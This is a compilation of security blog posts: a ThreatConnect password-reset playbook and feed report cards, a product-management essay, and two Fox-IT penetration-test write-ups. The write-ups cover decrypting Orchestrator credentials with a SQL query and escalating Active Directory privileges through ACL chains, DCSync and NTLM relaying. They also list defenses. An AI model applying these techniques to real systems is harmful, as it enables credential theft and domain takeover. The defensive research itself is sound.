The next time you're at a show like RSA and are overwhelmed by all the new tools you know your CISO is going to buy, just remind yourself: I have ThreatConnect. I have the support of the entire ThreatConnect Security Developer community. I can make this work.

If you're ready to start contributing or leveraging what others are doing, go ahead and check out the GitHub repos now! If you'd like to learn more about them, or have product feedback, please reach out to me directly.


Introducing Orchestrator decryption tool

Researched and written by Donny Maasland and Rindert Kramer


During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s System Center Orchestrator.
According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, monitoring and deployment of resources in your environment. This blogpost covers the encryption aspect of Orchestrator and introduces new tools to decrypt sensitive information stored in the Orchestrator database.

Orchestrator, variables, encryption and SQL

In Orchestrator, it is possible to create variables that can be used in runbooks. One of the possibilities is to store credentials in these variables. These variables can then be used to authenticate with other systems. Runbooks can use these variables to create an authenticated session towards the target system and run all the steps that are defined in the runbook in the context of the credentials that are specified in the variable.

Sensitive information, such as passwords, can be protected by using encrypted variables. The contents of these variables are stored encrypted in the database when they are created and are decrypted when they are used in runbooks. The picture below displays the dialog to create an encrypted variable.


Orchestrator uses the internal encryption functionality of Microsoft SQL Server (MSSQL). The decryption keys are stored in the SYS database and have to be loaded into the SQL session in order to decrypt data.

To decrypt the data, we need the encrypted content first. The following query returns the encrypted content:


If there are secret variables stored in the database, this will result in encrypted data, such as:

The data between the \`d.T.~De/ markers is the part we are interested in, which leaves us with the following string:
Please note that the \`d.T.~De/ value might differ per data type.

Since this data is encrypted, the decryption key needs to be loaded into the SQL session. To accomplish this, we open an SQL session and run the following query:


This will load the decryption key into the SQL session.

Now we run this string through the DECRYPTBYKEY function in MSSQL to decrypt the content with the encryption key that was loaded into the SQL session earlier. If successful, this results in a varbinary object that we need to convert to nvarchar for human-readable output.

The complete SQL query will look like this:

SELECT convert(nvarchar, decryptbykey(0x00F04DA615688A4C96C2891105226AE90100000059A187C285E8AC6C1090F48D0BFD2775165F9558EAE37729DA43BE92AD133CF697D2C5CC1E6E27E534754099780A0362C794C95F3747A1E65E869D2D43EC3597));

Executing this query will return the unencrypted value of the variable, as can be seen in the following screenshot.

Automating the process

Fox-IT created a script that automates this process. The script queries the secrets and decrypts them automatically. The result of the script can be seen in the screenshot below.

The script can be downloaded from Fox-IT’s Github repository:

Fox-IT also wrote a Metasploit post module to run this script through a meterpreter.

The Metasploit module supports integrated login. Optionally, it is possible to use MSSQL authentication by specifying the username and password parameters. By default, the script uses the ‘Orchestrator’ database, but it is also possible to specify another database with the database parameter. Fox-IT submitted a pull request to add this module to Metasploit, so hopefully the module will be available soon. The pull request can be found here:



Playbook Fridays: Forcing Active Directory (AD) Password Resets via ThreatConnect Victims

Leveraging the Active Directory and ThreatConnect integration to help automate security processes

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important, and, in many cases, to ensure the analysis process occurs consistently and in real time, without human intervention.

This post is the first in a series focused on integration scenarios between ThreatConnect and Microsoft Active Directory that customers can leverage to help automate security processes: connecting cyber threats and incidents in ThreatConnect with adjustments to security policy or enforcement of behavior for Active Directory users.

We've observed an issue that has plagued enterprises for some time now, and the longer it remains unaddressed, the greater the vulnerability to the organization. Microsoft Active Directory (AD) has been an indirect target for years, and awareness of the issue among CIOs and CISOs is only now reaching critical mass. When a phishing attack or any other account compromise occurs, hackers want to gain credentials to exploit infrastructure. Simple fact: the average Active Directory user has more than 100 account entitlements, making compromise of an Active Directory account highly critical. These compromises, of course, can lead to damaging breaches threatening an organization's livelihood.

Most SOC analysts concentrate tactically on identifying a phishing email and neutralizing it, blocking the URL and source. However, they do not verify that the login, and especially the password, has not been compromised. This is due to a variety of reasons, such as having to log into the AD directory, not knowing the infrastructure layout, and not having proper permission to make changes. When an attack has taken place, ThreatConnect's orchestration capabilities can automatically connect to AD, gather victim information -- such as email address or any other key attribute -- and then change the user's account policy so that at the next login they will be required to change their password. This type of rapid response enhances the overall security posture of the organization.

This Playbook is a straightforward example of forcing a user to reset their AD password after being flagged in ThreatConnect as a victim. When an analyst searches for the victim name in ThreatConnect, she can then add a tag, for example "flag", and this action triggers the Playbook to run in the background. The trigger drives the logic to query Active Directory and pull in the email address and other attributes necessary to populate the victim's asset information within ThreatConnect. The advantage is that over time ThreatConnect can report which employees were part of which cyber attacks related to this specific phishing email.

The master Playbook is illustrated below. The Victim Trigger drives the subsequent steps after a tag is applied. Next, there are two Playbook Components: LDAP Email Query (in orange) and the LDAP Password Reset 1. These reusable Components can be leveraged in other Playbooks ThreatConnect users may want to deploy.



The above integration is bi-directional with LDAP/Active Directory. It will also send a follow-up Slack message to remind the user that they will have a password reset at their next login.

Below is the Playbook Component which will query LDAP/Active Directory for specific attribute information. In this Playbook, we will query the LDAP/Active Directory email info for the victim. We then convert it to String data and post the email info into ThreatConnect.



Below is the Playbook Component that modifies the LDAP/Active Directory attribute pwdLastSet. Setting this attribute to 0 forces the user to change their password at the next login. The Component also sends a Slack message at the end of the Playbook announcing the upcoming password reset.
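The two Components above boil down to a pair of plain LDAP operations. A minimal Python sketch (illustrative only; the function names, DN, and account name are assumptions for the example, not ThreatConnect's implementation -- in a live Playbook these would be issued over LDAP, e.g. with a library such as ldap3):

```python
# Illustrative sketch only -- not ThreatConnect's actual Playbook code.
# It expresses the two Component steps as the raw LDAP pieces they need:
# a search filter to find the victim's entry (to read the mail attribute),
# and a modify payload that zeroes pwdLastSet.

def build_victim_query(sam_account_name):
    """LDAP filter that locates the victim's user entry."""
    return f"(&(objectClass=user)(sAMAccountName={sam_account_name}))"

def build_password_reset(dn):
    """Modify payload: pwdLastSet = 0 forces a password change at next login.
    AD normally stores a timestamp here; 0 is the 'must change' sentinel."""
    return {"dn": dn, "changes": {"pwdLastSet": 0}}

print(build_victim_query("jdoe"))
print(build_password_reset("CN=J Doe,OU=Staff,DC=corp,DC=example"))
```

The query step reads the mail attribute from the returned entry; the reset step applies the modify payload to the victim's DN.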


Below is the result of the email information queried by ThreatConnect against LDAP/AD, along with any other key attribute or relevant Asset information.


The example below demonstrates the change of the Active Directory attribute to force the user to change their password at the next login.


In the next blog post of this series, we'll show how the process can begin with the receipt of a phishing email where we use information in the email to query and affect changes in Active Directory for a number of users, and how that data can be reported in a ThreatConnect Dashboard.

The post Playbook Fridays: Forcing Active Directory (AD) Password Resets via ThreatConnect Victims appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing ThreatConnect’s Intel Report Cards

Providing insight into how certain feeds are performing within ThreatConnect

As part of our latest release, we've introduced a new feature to help users better understand the intelligence they're pumping into their systems.  Intelligence can be a fickle thing; indicators are by their very nature ephemeral and part of our job is to better curate them. We find patterns not only in the intelligence itself, but in the sources of intelligence. As analysts, we frequently find ourselves asking a simple question: "Who's telling me this, and how much do I care?" We sought to tackle this problem on a few fronts in ThreatConnect in the form of Report Cards, giving you insight into how certain feeds are performing across the ThreatConnect ecosystem.  

First and foremost, we wanted to leverage any insights gleaned from our vast user base. We have users spanning dozens of industries across a global footprint. If a customer in Europe is seeing a lot of false positives come from a set of indicators, we want the rest of ThreatConnect users to learn from that. This is where ThreatConnect's CAL™ (Collective Analytics Layer) comes in. All participating instances of CAL are sending some anonymized, aggregated telemetry back. This gives us centralized insight which we can distribute to our customers. This telemetry includes automated tallies, such as how often an indicator is being observed in networks, as well as human-curated data such as how often False Positives are being reported.

Feed selection interface, driven by CAL's insights (27 March 2018)


By combining and standardizing these metrics, CAL can start to paint a picture of various intelligence feeds. CAL knows which feeds are reporting on which indicators, and can overlay this information at scale with the above telemetry. This has an impact at the strategic level, when deciding which feeds to enable in your instance. We're all familiar with the "garbage in, garbage out" problem -- simply turning on every feed may not be productive for your environment and team. High-volume feeds that yield a lot of false positives, report on indicators outside of your areas of interest, or are simply repeated elsewhere may not be worth your time. Now system administrators can make an informed decision on which feeds they would like to enable in their instance, and with a single button click can get months of historical data. These feeds are curated by the ThreatConnect Research team, which does its best to prune and automatically deprecate older data to keep the feeds relevant.

ThreatConnect's Intelligence Report card helps you better understand a candidate feed (27 March 2018)


The Report Card view goes into more depth on a particular feed. For each feed CAL knows about, it will give you a bullet chart containing the feed's performance on a few key dimensions, as determined by the ThreatConnect analytics team.  In short, a bullet chart identifies ranges of performance (red, yellow, and green here) to give you a quick representation of the groupings we've identified for a particular metric. A vertical red line indicates what we consider to be a successful "target" number for that metric, and the gray line indicates the selected feed's actual performance on that metric. We've identified a few key metrics that we think will help our users make decisions:

  • Reliability Rating is a measure of false positive reports on indicators reported by this feed. It's more than just a count of how many votes have been tallied by users. We also consider things like how egregious a false positive is, since alerting on a widely used, benign indicator in your SIEM is a much more grave offense in our book. We give this a letter grade, from A-F, to help you identify how likely this feed is to waste your time.
  • Unique Indicators is a simple percentage of how many indicators contained within this feed aren't found anywhere else. If a feed's indicators are often found elsewhere, then some organizations may prefer not to duplicate data by adding them again. There may be reasons to add them anyway, as we see below with ThreatAssess. Nonetheless, this metric is a good way to help you understand how much novelty this feed adds.
  • First Reported measures the percentage of indicators which, when identified in other feeds, were found in this feed first. Even if a feed's indicators are often found elsewhere, this feed may have value if it's reporting those indicators significantly earlier. This metric helps you understand how timely a feed is relative to other feeds.
  • Scoring Disposition is a measure of the score that CAL assigns to indicators, on a 0-1000 scale. This score can be factored into the ThreatAssess score (alongside your tailored, local analysis). The Scoring Disposition is not an average of those scores, but a weighted selection based on the indicators we know our users care about. This metric helps answer how bad the things in this feed are, according to CAL.
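Two of these metrics are simple enough to sketch. The toy computation below shows one plausible way to derive Unique Indicators and First Reported from raw feed data; CAL's actual formulas and weighting are not public, so the details here are assumptions, and the feed data is invented:

```python
# Hedged sketch: plausible computations for two Report Card metrics.
from datetime import date

# invented sample data: feed -> {indicator: first-seen date}
feeds = {
    "feed_a": {"1.2.3.4": date(2018, 1, 5), "evil.example": date(2018, 1, 7)},
    "feed_b": {"1.2.3.4": date(2018, 1, 9), "other.example": date(2018, 1, 2)},
}

def unique_indicators(feed):
    """Percentage of this feed's indicators found in no other feed."""
    mine = set(feeds[feed])
    others = set().union(*(set(v) for k, v in feeds.items() if k != feed))
    return 100.0 * len(mine - others) / len(mine)

def first_reported(feed):
    """Of the shared indicators, percentage this feed reported earliest."""
    shared = [i for i in feeds[feed]
              if any(i in v for k, v in feeds.items() if k != feed)]
    if not shared:
        return 0.0
    firsts = sum(
        all(feeds[feed][i] < v[i]
            for k, v in feeds.items() if k != feed and i in v)
        for i in shared)
    return 100.0 * firsts / len(shared)

print(unique_indicators("feed_a"))  # -> 50.0 (evil.example is unique)
print(first_reported("feed_a"))     # -> 100.0 (saw 1.2.3.4 before feed_b)
```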

The Report Card also contains a few other key fields, namely the Daily Indicators graph and the Common Classifiers box. The Daily Indicators chart shows you the indicator volume coming from a source over time, to help you understand the ebbs and flows of a particular feed. The Common Classifiers box shows which Classifiers are most common on indicators in the selected feed. Combined, these can give you an idea of how many indicators am I signing up for, and what flavors are they?

All of these insights are designed to help you make better decisions throughout your security lifecycle. Ultimately, the decision to add a feed should be a calculated one. When an analyst sees that an indicator was found in a particular feed, they may choose to use that information based on the Reliability Rating of that feed. You can leverage these insights as trust levels via ThreatAssess, allowing you to make such choices for every indicator in your instance.

We'll continue to improve our feed offering and expand upon our Report Cards as we hear more feedback from you, so please feel free to Tweet us @ThreatConnect.


Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema


During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kinds of scenarios. Often overlooked are the Access Control Lists (ACLs) in AD. An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that, when configured correctly, all descendant objects will inherit the ACL. The ACL of the OU wherein the objects reside contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied to the OU and/or descending objects. The identity specified in the ACE does not necessarily need to be the user account itself; it is common practice to apply permissions to AD security groups. By adding the user account as a member of such a security group, the user account is granted the permissions that are configured within the ACE.

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way of maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too deeply. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only one group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.
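Resolving such nested memberships is a plain graph traversal. A minimal Python sketch, using the groups from the example above (the data structure is invented for illustration; real tooling would pull these edges from AD):

```python
# Minimal sketch of recursive (nested) AD group membership resolution.
from collections import deque

# member-of edges: each group maps to the groups it is directly a member of
member_of = {
    "Group_C": ["Group_B"],
    "Group_B": ["Group_A"],
    "Group_A": [],
}

def effective_groups(direct_memberships):
    """All groups an account belongs to, directly or through nesting (BFS)."""
    seen, todo = set(), deque(direct_memberships)
    while todo:
        group = todo.popleft()
        if group in seen:
            continue
        seen.add(group)
        todo.extend(member_of.get(group, []))
    return seen

# Bob is added only to Group_C, but inherits Group_B and Group_A as well:
print(sorted(effective_groups(["Group_C"])))
# -> ['Group_A', 'Group_B', 'Group_C']
```

The `seen` set also guards against cycles, which can occur in real AD group nesting.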

Escalating privileges in AD with Exchange

During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and grants access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is in turn a member of the Exchange Windows Permissions security group.


By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1


The writeDACL permission allows an identity to modify permissions on the designated object (in other words: modify the ACL), which means that by being a member of the Organization Management group we were able to escalate our privileges to those of a domain administrator.
To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page:

Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.


Invoke-ACLPwn is a PowerShell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain, as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permission on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate, but can end up producing a chain that yields writeDACL permission on the domain object.
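The enumeration just described can be modeled as a breadth-first search over a graph whose edges are group memberships and ACE write permissions. The toy Python below (the edge data is invented for illustration, mirroring the Exchange example in this post; it is not the tool's actual code) finds the shortest chain from a user to writeDACL on the domain object:

```python
# Toy sketch of Invoke-ACLPwn-style chain discovery as a BFS over
# membership and permission edges. All edge data here is invented.
from collections import deque

edges = {
    "user:bob": ["group:testgroup_a"],
    "group:testgroup_a": ["writeMembers:Organization Management"],
    "writeMembers:Organization Management": ["group:Organization Management"],
    "group:Organization Management": ["writeMembers:Exchange Trusted Subsystem"],
    "writeMembers:Exchange Trusted Subsystem": ["group:Exchange Windows Permissions"],
    "group:Exchange Windows Permissions": ["writeDACL:domain"],
}

def find_chain(start, goal):
    """BFS for the shortest exploitation chain from start to goal."""
    todo, seen = deque([[start]]), {start}
    while todo:
        path = todo.popleft()
        if path[-1] == goal:
            return path
        for nxt in edges.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(path + [nxt])
    return None  # no chain exists

chain = find_chain("user:bob", "writeDACL:domain")
print(len(chain))  # -> 7 links in this invented chain
```

In the real tool the edge set is derived from the SharpHound export, and each link of the discovered chain is then exploited in order.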


When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimikatz' DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was a member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z).
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect member of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management group
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups

The result of the tool can be seen in the following screenshot:


Please note that in this example we used the ACL configuration that was configured during the installation of Exchange. However, the tool does not rely on Exchange or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated and exploited. There are other types of access rights, such as owner, writeOwner, genericAll, et cetera, that can be exploited on other objects as well. These access rights are explained in depth in this whitepaper by the BloodHound team. Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here:


Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first attack is called the ACL attack, in which the ACL on the Domain object is modified and a user under the attacker's control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as described in the previous sections. If modifying the domain ACL is not possible, the ability to add members to several high-privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to, for example, IT department members.
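The choice between the two attacks reduces to simple branching logic. A hedged Python sketch of that decision (the structure is assumed for illustration; the real implementation lives in impacket's LDAP attack code):

```python
# Reduced sketch of the escalation decision described above: prefer the
# ACL attack when the relayed account can write the domain object's DACL,
# otherwise fall back to a Group attack on the first writable group.

HIGH_PRIV_GROUPS = (
    "Enterprise Admins",
    "Domain Admins",
    "Backup Operators",   # can back up critical files on the DC
    "Account Operators",  # control over almost all groups in the domain
)

def choose_escalation(can_write_domain_dacl, writable_groups):
    if can_write_domain_dacl:
        return "acl-attack: grant Replication-Get-Changes-All"
    for group in HIGH_PRIV_GROUPS:
        if group in writable_groups:
            return f"group-attack: add user to {group}"
    return "no escalation path"

print(choose_escalation(True, []))
print(choose_escalation(False, ["Account Operators"]))
```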

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example of such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker's machine, for example by using mitm6 for a network-level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket's tooling or with Mimikatz:


Similarly, if an attacker has Administrative privileges on the Exchange server, it is possible to escalate privileges in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker's machine from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-WebRequest being called, which runs from the SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM.


The 404 error here is expected, as the relay server returns a 404 page once the relaying attack is complete.

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub:


As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as BloodHound3. BloodHound can make an export of all ACLs in the domain, which helps in identifying dangerous ACLs.

Remove writeDACL permission for the Exchange Windows Permissions group
Remove the writeDACL permission for the Exchange Windows Permissions group. The following GitHub page contains a PowerShell script which can assist with this:

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.

Audit and monitor changes to the ACL
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article:

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.


Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10, ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object.
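For quick triage off-box, the ACE strings can also be split mechanically. A small Python helper (a rough sketch, not a full SDDL parser; the sample descriptor is invented, and on Windows ConvertFrom-SDDL remains the authoritative way to interpret these strings):

```python
# Hedged helper: pull each ACE string out of an SDDL security descriptor
# and split it into its semicolon-separated fields
# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid).
import re

def parse_aces(sddl):
    aces = []
    for raw in re.findall(r"\(([^)]*)\)", sddl):
        fields = (raw.split(";") + [""] * 6)[:6]
        ace_type, ace_flags, rights, _obj, _inherit, sid = fields
        aces.append({"type": ace_type, "flags": ace_flags,
                     "rights": rights, "sid": sid})
    return aces

sample = "D:(A;;RPWP;;;SY)(A;CI;WD;;;BA)"  # invented example descriptor
for ace in parse_aces(sample):
    print(ace["type"], ace["rights"], ace["sid"])
```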


If the server runs Windows Server 2016 as its operating system, it is also possible to see the original and modified descriptors. For more information:

With this information you should be able to start an investigation to discover what was modified, when it happened, and why.



Security Product Management at Large Companies vs. Startups

Is it better to perform product management of information security solutions at a large company or at a startup? Picking the setting that’s right for you isn’t as simple as craving the exuberant energy of a young firm or coveting the resources and brand of an organization that’s been around for a while. Each environment has its challenges and advantages for product managers. The type of innovation, nature of collaboration, sales dynamics, and cultural nuances are among the factors to consider when deciding which setting is best for you.

The perspective below is based on my product management experiences in the field of information security, though I suspect it's applicable to product managers in other hi-tech environments.

Product Management at a Large Firm

In the world of information security, industry incumbents are usually large organizations. This is in part because growing in a way that satisfies investors generally requires the financial might, brand and customer access that’s hard for small cyber-security companies to achieve. Moreover, customers who are not early adopters often find it easier to focus their purchasing on a single provider of unified infosec solutions. These dynamics set the context for the product manager’s role at large firms.

Access to Customers

Though the specifics differ across organizations, product management often involves defining capabilities and driving adoption. The product manager's most significant advantage at a large company is probably access to customers. This is due to the size of the firm's sales and marketing organization, as well as the large number of companies that have already purchased some of the company's products.

Such access helps with understanding requirements for new products, improving existing technologies, and finding new customers. For example, you could bring your product to a new geography by using the sales force present in that area without having to hire a dedicated team. Also, it’s easier to upsell a complementary solution than build a new customer relationship from scratch.

Access to Expertise

Another benefit of a large organization is access to funds and expertise that's sometimes hard to obtain in a young, small company. Instead of hiring a full-time specialist for a particular task, you might be able to draw upon the skills and experience of someone who supports multiple products and teams. In addition, assuming your efforts receive the necessary funding, you might find it easier to pursue product objectives and enter new markets in a way that could be hard for a startup to accomplish. Securing that funding isn't always easy, though: budgetary planning in large companies can be more onerous than venture capital fundraising.

Organizational Structure

Working in any capacity at an established firm requires that you understand and follow the often-changing bureaucratic processes inherent to any large entity. Depending on the organization's structure, product managers in such environments might lack direct control over the teams vital to the success of their product. Therefore, the product manager needs to excel at forming cross-functional relationships and influencing indirectly. (Coincidentally, this is also a key skill-set for many Chief Information Security Officers.)

Sometimes even understanding all of your own objectives and success criteria in such environments can be challenging. It can be even harder to stay abreast of the responsibilities of others in the corporate structure. On the other hand, one of the upsides of a large organization is the room to grow one’s responsibilities vertically and horizontally without switching organizations. This is often impractical in small companies.

What It’s Like at a Large Firm

In a nutshell, these are the characteristics inherent to product management roles at large companies:

  • An established sales organization, which provides access to customers
  • Potentially conflicting priorities and incentives among groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially easier access to funding for sophisticated projects and complex products
  • Possibly easier access to the needed expertise
  • Well-defined career development roadmap

I loved working as a security product manager at a large company. I was able to oversee a range of in-house software products and managed services focused on data security. One of my solutions involved custom-developed hardware with integrated home-grown and third-party software, serviced by a team of help desk and in-the-field technicians. A fun challenge!

I also appreciated the chance to develop expertise in the industries that my employer serviced, so I could position infosec benefits in the context relevant to those customers. I enjoyed staying abreast of the social dynamics and politics of a siloed, matrixed organization. After a while I decided to leave because I was starting to feel a bit too comfortable. I also developed an appetite for risk and began craving the energy inherent to startups.

Product Management in a Startup

One of the most liberating, yet scary, aspects of product management at a startup is that you're building the product from a clean slate. While product managers at established companies often need to account for legacy requirements and internal dependencies, a young firm is generally free of such entanglements, at least at the onset of its journey.

What markets are we targeting? How will we reach customers? What comprises the minimum viable product? Though product managers ask such questions in all types of companies, startups are less likely to survive erroneous answers in the long term. Fortunately, short-term experiments are easier to perform to validate ideas before making strategic commitments.

Experimenting With Capabilities

Working in a small, nimble company allows the product manager to quickly experiment with ideas, get them implemented, introduce them into the field, and gather feedback. In the world of infosec, rapidly iterating through defensive capabilities of the product is useful for multiple reasons, including the ability to assess—based on real-world feedback—whether the approach works against threats.

Have an idea that is so crazy, it just might work? In a startup, you’re more likely to have a chance to try some aspect of your approach, so you can rapidly determine whether it’s worth pursuing further. Moreover, given the mindshare that the industry’s incumbents have with customers, fast iterations help understand which product capabilities, delivered by the startup, the customers will truly value.

Fluid Responsibilities

In all companies, almost every individual has a certain role for which they’ve been hired. Yet, the specific responsibilities assigned to that role in a young firm often benefit from the person’s interpretation, and are based on the person’s strengths and the company’s need at a given moment. A security product manager working at a startup might need to assist with pre-sales activities, take a part in marketing projects, perform threat research and potentially develop proof-of-concept code, depending on what expertise the person possesses and what the company requires.

People in a small company are less likely to have the "it's not my job" attitude than those in highly structured, large organizations. A startup generally has fewer silos, making it easier to engage in activities that interest the person even if they are outside his or her direct responsibilities. This can be stressful and draining at times. On the other hand, it makes it difficult to get bored, and also gives the product manager an opportunity to acquire skills in areas tangential to product management. (For additional details regarding this, see my article What's It Like to Join a Startup's Executive Team?)

Customer Reach

Product manager’s access to customers and prospects at a startup tends to be more immediate and direct than at a large corporation. This is in part because of the many hats that the product manager needs to wear, sometimes acting as a sales engineer and at times helping with support duties. These tasks give the person the opportunity to hear unfiltered feedback from current and potential users of the product.

However, a young company simply lacks a sales force at the scale needed to reach many customers until the firm builds up steam. (See Access to Customers above.) This means that the product manager might need to help identify prospects, which can be outside the comfort zone of individuals who haven't participated in sales efforts in this capacity.

What It’s Like at a Startup

Here are the key aspects of performing product management at a startup:

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

I’m presently responsible for product management at Minerva Labs, a young endpoint security company. I’m loving the make-or-break feeling of the startup. For the first time, I’m overseeing the direction of a core product that’s built in-house, rather than managing a solution built upon third-party technology. It’s gratifying to be involved in the creation of new technology in such a direct way.

